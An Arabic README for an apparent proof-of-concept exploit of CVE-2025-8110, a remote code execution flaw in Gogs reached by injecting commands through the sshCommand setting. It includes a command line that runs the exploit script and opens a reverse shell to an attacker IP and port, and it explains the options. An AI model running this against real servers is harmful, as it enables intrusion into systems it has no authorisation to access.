
CVE-2025-8110 PoC
يحتوي هذا المستودع على برهان المفهوم (PoC) للثغرة CVE-2025-8110، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Gogs. يستهدف الاستغلال خادم SSH الداخلي، مما يسمح للمهاجمين بحقن أوامر ضارة عبر إعداد sshCommand.
لتشغيل الاستغلال، استخدم السكربت CVE-2025-8110.py مع عنوان URL الهدف لـ Gogs ومضيف/منفذ الاستماع الخاص بك للصد العكسي.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: عنوان URL الأساسي لمثيل Gogs الهدف (مثال: http://localhost:3000).-lh, --host: عنوان IP الذي يجب أن يتصل به الصد العكسي.-lp, --port: المنفذ الذي يجب أن يتصل به الصد العكسي.-x, --proxy: (اختياري) استخدام وكيل محلي على http://localhost:8080 لأغراض التصحيح.برهان المفهوم (PoC) هذا مخصص للأغراض التعليمية والبحثية فقط. ويهدف إلى مساعدة الباحثين الأمنيين والمسؤولين في فهم وتخفيف أثر الثغرة CVE-2025-8110.
لا يتحمل المؤلف أي مسؤولية عن أي استخدام غير مصرح به أو ضار لهذا الكود. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. باستخدامك لهذا الكود، فإنك توافق على تحمل المسؤولية الكاملة عن أفعالك.